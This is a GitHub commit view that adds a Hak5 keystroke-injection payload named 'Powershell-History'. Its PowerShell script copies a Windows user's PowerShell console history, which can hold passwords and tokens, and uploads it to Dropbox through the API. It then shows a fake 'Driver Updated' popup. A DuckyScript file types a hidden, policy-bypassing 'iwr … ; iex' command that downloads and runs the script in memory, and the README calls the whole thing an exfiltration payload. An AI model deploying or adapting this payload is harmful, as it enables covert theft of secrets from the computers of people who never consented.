Merge pull request #562 from atomiczsec/master

New Payload - Powershell-History
pull/564/head
hak5glytch 2022-11-01 17:36:11 -07:00 committed by GitHub
commit afd456627d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 171 additions and 0 deletions

View File

@ -0,0 +1,45 @@
#Powershell-History
# See if file is a thing
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
try {
Write-Host "The Powershell History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Powershell History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

View File

@ -0,0 +1,110 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Powershell-History
A payload to exfiltrate the history of the powershell console
## Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

View File

@ -0,0 +1,16 @@
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1